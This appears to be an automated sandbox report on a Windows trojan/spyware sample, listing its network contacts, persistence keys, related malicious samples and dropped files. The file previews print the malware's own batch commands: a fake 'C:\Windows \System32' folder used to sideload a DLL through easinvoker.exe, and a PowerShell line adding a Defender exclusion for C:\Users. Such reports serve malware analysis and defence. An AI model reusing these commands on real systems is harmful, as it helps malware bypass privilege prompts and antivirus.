                                                                              https://www.netlock.net/docs0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://www.pmail.com0vJrK0NCd1.exe, 00000000.00000003.422250057.0000000002F44000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.422202761.0000000002F7F000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.422437505.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.422677307.0000000004E68000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.422159926.0000000002F7F000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.422595078.0000000004E68000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.422700357.0000000004E68000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.421759155.0000000002F47000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000002.471795080.0000000010059000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf00vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.e-trust.be/CPS/QNcerts0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://ocsp.ncdc.gov.sa00vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://fedir.comsign.co.il/crl/ComSignCA.crl00vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://www.baidu.com/favicon.icohttps://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part=0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl00vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://web.ncdc.gov.sa/crl/nrcaparta1.crl0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://www.datev.de/zertifikat-policy-int00vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://www.modern.ie/Umbraco/Api/CompatIssueApi/PostCompatIssue?version=20vJrK0NCd1.exe, 00000000.00000003.381746840.000000000341A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://repository.luxtrust.lu00vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://cps.chambersign.org/cps/chambersroot.html00vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://www.acabogacia.org00vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://ocsp.eca.hinet.net/OCSP/ocspG2sha200vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.firmaprofesional.com/cps00vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.uce.gub.uy/acrn/acrn.crl00vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown

                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          185.216.71.113
                                                                                          		greatzillart.ydns.euGermany
                                                                                          		43659CLOUDCOMPUTINGDEfalse
                                                                                          185.181.116.217
                                                                                          		balkancelikdovme.comUnited Kingdom
                                                                                          		29017GYRONGBtrue

                                                                                          Private

                                                                                          IP
                                                                                          127.0.0.1

                                                                                          General Information

                                                                                          Joe Sandbox Version:38.0.0 Beryl
                                                                                          Analysis ID:1296068
                                                                                          Start date and time:2023-08-23 19:29:07 +02:00
                                                                                          Joe Sandbox Product:CloudBasic
                                                                                          Overall analysis duration:0h 13m 44s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                          Number of analysed new started processes analysed:42
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • HDC enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample file name:0vJrK0NCd1.exe
                                                                                          Original Sample Name:8bf8b980381fd607ec9065bfbcd572973770ee77c815354a35455c10651516d5.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.expl.evad.winEXE@42/20@5/3
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 50%
                                                                                          HDC Information:
                                                                                          • Successful, ratio: 13.9% (good quality ratio 10.1%)
                                                                                          • Quality average: 63.5%
                                                                                          • Quality standard deviation: 40.5%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 86%
                                                                                          • Number of executed functions: 2
                                                                                          • Number of non-executed functions: 25
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                          • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, g.bing.com, displaycatalog.mp.microsoft.com, arc.msn.com
                                                                                          • Execution Graph export aborted for target 0vJrK0NCd1.exe, PID 6460 because there are no executed function
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                          • Report size getting too big, too many NtWriteVirtualMemory calls found.

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          19:30:29API Interceptor1x Sleep call for process: 0vJrK0NCd1.exe modified
                                                                                          19:30:41AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Elpuxpki C:\Users\Public\Elpuxpki.url
                                                                                          19:30:46API Interceptor37x Sleep call for process: powershell.exe modified
                                                                                          19:30:50AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Elpuxpki C:\Users\Public\Elpuxpki.url
                                                                                          19:31:12API Interceptor2x Sleep call for process: Elpuxpki.PIF modified

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          No context

                                                                                          Domains

                                                                                          No context

                                                                                          ASNs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          CLOUDCOMPUTINGDE1hbJEJJnig.exeGet hashmaliciousAsyncRAT, zgRATBrowse
                                                                                          • 194.169.175.43
                                                                                          https://schuceo.com/viloorel/hgfijhA/?userid=AhmedS.AlShamsi@cpc.gov.aeGet hashmaliciousUnknownBrowse
                                                                                          • 80.76.51.101
                                                                                          https://schuceo.com/viloorel/hgfijhA/?userid=AhmedS.AlShamsi@cpc.gov.aeGet hashmaliciousUnknownBrowse
                                                                                          • 80.76.51.44
                                                                                          https://schuceo.com/viloorel/hgfijhA/?userid=AhmedS.AlShamsi@cpc.gov.aeGet hashmaliciousUnknownBrowse
                                                                                          • 80.76.51.101
                                                                                          August_Quotation.xlam.xlsxGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                          • 80.76.51.248
                                                                                          Order_Request.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                          • 80.76.51.248
                                                                                          NUEVO_PEDIDO_-_GF0003.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                          • 80.76.51.248
                                                                                          NUEVO_PEDIDO_-_CF0002.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                          • 80.76.51.248
                                                                                          pee.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                          • 185.216.71.134
                                                                                          OC.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                          • 80.76.51.248
                                                                                          New_Order.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                          • 80.76.51.248
                                                                                          BOQ_MXN9900.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                          • 80.76.51.248
                                                                                          Purchase_Order.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                          • 80.76.51.248
                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                          • 185.216.71.79
                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                          • 185.216.71.79
                                                                                          NOVA_ORDEM_-_CF0002_WJO-001.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                          • 80.76.51.248
                                                                                          NUEVO_PEDIDO_-_CF0002.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                          • 80.76.51.248
                                                                                          file.exeGet hashmaliciousClipboard Hijacker, PrivateLoader, RisePro StealerBrowse
                                                                                          • 194.169.175.123
                                                                                          pcIacW4ADx.elfGet hashmaliciousMiraiBrowse
                                                                                          • 185.216.71.187
                                                                                          WhcHIvZtui.elfGet hashmaliciousMiraiBrowse
                                                                                          • 185.216.71.187

                                                                                          JA3 Fingerprints

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          ce5f3254611a8c095a3d821d445398772023 PayNet - Critical Security Incident Official Notice.docGet hashmaliciousUnknownBrowse
                                                                                          • 185.181.116.217
                                                                                          file.exeGet hashmaliciousGlupteba, SmokeLoader, StealcBrowse
                                                                                          • 185.181.116.217
                                                                                          Setup.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                                                          • 185.181.116.217
                                                                                          file.exeGet hashmaliciousClipboard Hijacker, PrivateLoader, RisePro StealerBrowse
                                                                                          • 185.181.116.217
                                                                                          yzFg2xM3mK.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                          • 185.181.116.217
                                                                                          file.exeGet hashmaliciousGlupteba, SmokeLoaderBrowse
                                                                                          • 185.181.116.217
                                                                                          Past Due.xlsxGet hashmaliciousUnknownBrowse
                                                                                          • 185.181.116.217
                                                                                          Advanced_IP_Scanner.exeGet hashmaliciousDanaBotBrowse
                                                                                          • 185.181.116.217
                                                                                          file.exeGet hashmaliciousClipboard Hijacker, PrivateLoader, RisePro StealerBrowse
                                                                                          • 185.181.116.217
                                                                                          file.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoaderBrowse
                                                                                          • 185.181.116.217
                                                                                          file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                                          • 185.181.116.217
                                                                                          DropboxInstaller.exeGet hashmaliciousUnknownBrowse
                                                                                          • 185.181.116.217
                                                                                          GfwhNvMfdW.exeGet hashmaliciousUnknownBrowse
                                                                                          • 185.181.116.217
                                                                                          GfwhNvMfdW.exeGet hashmaliciousUnknownBrowse
                                                                                          • 185.181.116.217
                                                                                          LDX8pPMxTc.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                                          • 185.181.116.217
                                                                                          big_massive_gibbon.exeGet hashmaliciousUnknownBrowse
                                                                                          • 185.181.116.217
                                                                                          big_massive_gibbon.exeGet hashmaliciousUnknownBrowse
                                                                                          • 185.181.116.217
                                                                                          file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                                          • 185.181.116.217
                                                                                          LOGISTEC.xlsxGet hashmaliciousSharepointPhisherBrowse
                                                                                          • 185.181.116.217
                                                                                          Notice_8639466.htmlGet hashmaliciousUnknownBrowse
                                                                                          • 185.181.116.217

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\Program Files (x86)\eTDdgXlyKliyxvptonffOcjuSNyaDmlKRZHGbQGKEUWyXCTW\kbTpwNGCTopuOamSxeKXoFxnyEswVm.exe (copy)

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\0vJrK0NCd1.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):219079
                                                                                          Entropy (8bit):7.319708870300419
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:Agzj/mCtnRPF9cCGr/uHkBV+UdvrEFp7hKgo:AgzjhnRNh4uHkBjvrEH7Fo
                                                                                          MD5:6BE327A3243FA377A7373C8F1386FF70
                                                                                          SHA1:96DF0550E3BA991E0EA253C8712E1B7AB352CCAD
                                                                                          SHA-256:5B915FC5E46E431C3DAB4196CC4D129F54773C8C707B542DE7348F42C33F63B5
                                                                                          SHA-512:E4B555F706D354EF9556B4C08CA40B16E5FB27CC5A5CFAF980C16C853D68DA387DF8C6785AF5C4AE10776030C1B00EC2DCC8F7E54A131E71B7EC239C37638F0C
                                                                                          Malicious:true
                                                                                          Reputation:unknown
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.T6...6...6...}...<...}.......}..."...............'......."...}...1...6...T.......7.....:.7...6.R.7.......7...Rich6...........PE..L..../.d...............#.....d....................@..........................`............@..................................;..P....p.. ............................/..p............................/..@...............P............................text...3........................... ..`.rdata...c.......d..................@..@.data........P.......2..............@....rsrc... ....p.......<..............@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                          C:\Program Files (x86)\eTDdgXlyKliyxvptonffOcjuSNyaDmlKRZHGbQGKEUWyXCTW\kbTpwNGCTopuOamSxeKXoFxnyEswVm.exe.tmp

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\0vJrK0NCd1.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):219079
                                                                                          Entropy (8bit):7.319708870300419
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:Agzj/mCtnRPF9cCGr/uHkBV+UdvrEFp7hKgo:AgzjhnRNh4uHkBjvrEH7Fo
                                                                                          MD5:6BE327A3243FA377A7373C8F1386FF70
                                                                                          SHA1:96DF0550E3BA991E0EA253C8712E1B7AB352CCAD
                                                                                          SHA-256:5B915FC5E46E431C3DAB4196CC4D129F54773C8C707B542DE7348F42C33F63B5
                                                                                          SHA-512:E4B555F706D354EF9556B4C08CA40B16E5FB27CC5A5CFAF980C16C853D68DA387DF8C6785AF5C4AE10776030C1B00EC2DCC8F7E54A131E71B7EC239C37638F0C
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: Malware_Floxif_mpsvc_dll, Description: Malware - Floxif, Source: C:\Program Files (x86)\eTDdgXlyKliyxvptonffOcjuSNyaDmlKRZHGbQGKEUWyXCTW\kbTpwNGCTopuOamSxeKXoFxnyEswVm.exe.tmp, Author: Florian Roth
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          Reputation:unknown
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.T6...6...6...}...<...}.......}..."...............'......."...}...1...6...T.......7.....:.7...6.R.7.......7...Rich6...........PE..L..../.d...............#.....d....................@..........................`............@..................................;..P....p.. ............................/..p............................/..@...............P............................text...3........................... ..`.rdata...c.......d..................@..@.data........P.......2..............@....rsrc... ....p.......<..............@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                          C:\Program Files\Common Files\system\symsrv.dll

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\0vJrK0NCd1.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                          Category:dropped
                                                                                          Size (bytes):69337
                                                                                          Entropy (8bit):7.734269834755614
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:YjV8y93KQpFQmPLRk7G50zy/riF12jvRyo0hQk7ZL:c8y93KQjy7G55riF1cMo03V
                                                                                          MD5:7574CF2C64F35161AB1292E2F532AABF
                                                                                          SHA1:14BA3FA927A06224DFE587014299E834DEF4644F
                                                                                          SHA-256:DE055A89DE246E629A8694BDE18AF2B1605E4B9B493C7E4AEF669DD67ACF5085
                                                                                          SHA-512:4DB19F2D8D5BC1C7BBB812D3FA9C43B80FA22140B346D2760F090B73AED8A5177EDB4BDDC647A6EBD5A2DB8565BE5A1A36A602B0D759E38540D9A584BA5896AB
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_FloodFix, Description: Yara detected FloodFix, Source: C:\Program Files\Common Files\system\symsrv.dll, Author: Joe Security
                                                                                          • Rule: MALWARE_Win_FloodFix, Description: Detects FloodFix, Source: C:\Program Files\Common Files\system\symsrv.dll, Author: ditekSHen
                                                                                          • Rule: MAL_Floxif_Generic, Description: Detects Floxif Malware, Source: C:\Program Files\Common Files\system\symsrv.dll, Author: Florian Roth
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 92%
                                                                                          Reputation:unknown
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.'...I...I...I.i.E...I.$.B...I..G...I.$.C.{.I.}.B...I.p.Z...I...H..I...B...I...O...I...M...I.Rich..I.................PE..L......P...........!................................................................................................(.......L...........L...........................................................................................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................................................2.03.UPX!....

                                                                                          C:\ProgramData\remcos\logs.dat

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\colorcpl.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):216
                                                                                          Entropy (8bit):3.3841168718579873
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:rmlql+cOlclNCH5JWRal2Jl+7R0DAlBG45klovDl6ALilXIkqoojklovDl6v:KlHNG6H5YcIeeDAlOWAAe5q1gWAv
                                                                                          MD5:2B8B8BA09B64F6AC93B2B71F0CD5A746
                                                                                          SHA1:B66E9617BC2E64FEACF238BF820D0AB249C5336E
                                                                                          SHA-256:7C619CC7AC5B158F6C05B8040153DF0E4B8EDCA1B168EB5F602352CD43445B65
                                                                                          SHA-512:36CF0FA92AE8E90493CDDB89D74107CA4B7560502ED3C9EFA37EE27302CCBC4DF36A157325098125968C622C0579212CEA06F536F2CF68E850CACFB96520FC4F
                                                                                          Malicious:true
                                                                                          Reputation:unknown
                                                                                          Preview:....[.2.0.2.3./.0.8./.2.3. .1.9.:.3.0.:.4.7. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                                          C:\Users\Public\Elpuxpki.url

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\0vJrK0NCd1.exe
                                                                                          File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Elpuxpki.PIF">), ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):100
                                                                                          Entropy (8bit):5.093758880867781
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMtXFsjIvsb7scP+:HRYFVmTWDyzuFZE7lP+
                                                                                          MD5:B572EAA53E9BA50C1787118A10101FD4
                                                                                          SHA1:28A64E016FF966AD2BBA60741844968636B36D4D
                                                                                          SHA-256:FEC83921409B05AF5B93FE3D3BA7374AE1015DAF60D244D602F87C4FA0357BE4
                                                                                          SHA-512:B0C867C07698785A12D8EA06AF0A4069016C918D0558AFD90D0C0CC8F75358FD0F20A48485F579D73954171F7D159170E2E14E7F7C284C74543D3F32458CD72A
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Elpuxpki.PIF"..IconIndex=30..HotKey=51..

                                                                                          C:\Users\Public\Libraries\Elpuxpki.PIF

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\0vJrK0NCd1.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):1131463
                                                                                          Entropy (8bit):7.419554531680892
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:+9PSlSUTC5lG8L14BQG/AWgbPmEqE5pLixE7pnrEH7T:+9PUZT2d14aGoTlnp52
                                                                                          MD5:533B3DF0E597C50E1129EC807FD6BBCF
                                                                                          SHA1:0561FC6471CB5E2F0AA9E6B3E3FDFA9FD2586DBC
                                                                                          SHA-256:8BF8B980381FD607EC9065BFBCD572973770EE77C815354A35455C10651516D5
                                                                                          SHA-512:0BB3A148E72A30F4BF5AAD8F27AA8CA1F8CA2EE36E498C395A5AC8091F3BFD9ECE8CB6430881EAE79A30A077B90F3F1D565833F303017EC01EE806C819BC4CD6
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\Public\Libraries\Elpuxpki.PIF, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 92%
                                                                                          Reputation:unknown
                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................d.............@..........................p...................@..............................,#..................................................................................................................CODE................................ ..`DATA................................@...BSS......................................idata..,#.......$..................@....tls.....................................rdata..............................@..P.reloc...l... ...n..................@..P.rsrc................<..............@..P.............p......................@..P........................................................................................................................................

                                                                                          C:\Users\Public\Libraries\ElpuxpkiO.bat

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\0vJrK0NCd1.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):466
                                                                                          Entropy (8bit):5.064740183649332
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:pLXzU44BbzUG2cL4XBbg/T2cLZCUULT2cLZCOhGKFIs2cLZZi2cL9aXSLp6N2cLR:ljU4MvUhzGiJL6EGeWkVPS93tOf
                                                                                          MD5:9E80036AABE3227DBF98B3975051A53B
                                                                                          SHA1:9670AAB8897770A93293D85426B7B13DDA23A152
                                                                                          SHA-256:964AAB3B72B3545FABC58A209714EBEADE739A0FEC40B33AF675D7157B9CB252
                                                                                          SHA-512:107FB6B364CF92730ACA1A044F7769A1F4AED39A72F031A5004CCF09B3BEBABAC5FC88B3D0F85EB64C665404136DB13678718BAD36BEA4311F07726684ED0A03
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview:cmd.exe /c mkdir "\\?\C:\Windows " ..cmd.exe /c mkdir "\\?\C:\Windows \System32"..cmd.exe /c ECHO F|xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y..cmd.exe /c ECHO F|xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y..cmd.exe /c ECHO F|xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y.."C:\Windows \System32\easinvoker.exe"..ping 127.0.0.1 -n 6 > nul..del /q "C:\Windows \System32\*"..rmdir "C:\Windows \System32"..rmdir "C:\Windows \"..exit..

                                                                                          C:\Users\Public\Libraries\KDECO.bat

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\0vJrK0NCd1.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):152
                                                                                          Entropy (8bit):4.694584085826828
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:pLACpr5LJJLNyMhQQNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OAn:pLXrznyiMMQ75ieGgdEYlRA/An
                                                                                          MD5:7E5FBD29557A68383DFB34E696964E93
                                                                                          SHA1:C1F748F89B47864301255D1FB2BFED04ED0D1300
                                                                                          SHA-256:4E55B1BBE2E0E099592AC57A747FA8D4EF67409901D6C64323A1B73D50E5DE67
                                                                                          SHA-512:7DCB6582B03E7BF0CAB2168DC775CA6D7A15EBB097FD2CDD3445B6D35EE128386FB9AA6A548B745C32540E358B2AA4D7C78A6F59F85C32065735FC54A6A2BB6A
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview:cmd.exe /c start /min powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit..

                                                                                          C:\Users\Public\Libraries\Null

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\0vJrK0NCd1.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4
                                                                                          Entropy (8bit):2.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:iov:iov
                                                                                          MD5:BA64D7750A2764B4A814239B16694BED
                                                                                          SHA1:44173C517074791FFA5E7C49E221B73DA50D4F0D
                                                                                          SHA-256:9429C669F867AEECCD34ED938BEB917D650FC5557F1C0BF1CA67466A956E6041
                                                                                          SHA-512:CB45D037CA06583C8771685516313971D73C0571BBEF13D1AEB398E4E11BAF51379D878CC52DAAC107F9D1DE8F3709B3A86CFE8A42FCA7BE98159CE9D688FE7D
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview:74..

                                                                                          C:\Users\Public\Libraries\easinvoker.exe

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\0vJrK0NCd1.exe
                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):131648
                                                                                          Entropy (8bit):5.225468064273746
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:zar2xXibKcf5K67+k02XbFbosspwUUgcR:Nibl7+k02XZb9UA
                                                                                          MD5:231CE1E1D7D98B44371FFFF407D68B59
                                                                                          SHA1:25510D0F6353DBF0C9F72FC880DE7585E34B28FF
                                                                                          SHA-256:30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
                                                                                          SHA-512:520887B01BDA96B7C4F91B9330A5C03A12F7C7F266D4359432E7BACC76B0EEF377C05A4361F8FA80AD0B94B5865699D747A5D94A2D3DCDB85DABF5887BB6C612
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Reputation:unknown
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........GF..)...)...).,.....).,.....).,.....)...(.V.).,.....).,.....).,.....).,.....).Rich..).........................PE..d...^PPT.........."..........D...... ..........@............................. ......z................ ..................................................................@&......4....................................................................................text............................... ..`.imrsiv..................................data...............................@....pdata..............................@..@.idata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................

                                                                                          C:\Users\Public\Libraries\netutils.dll

                                                                                          Download File
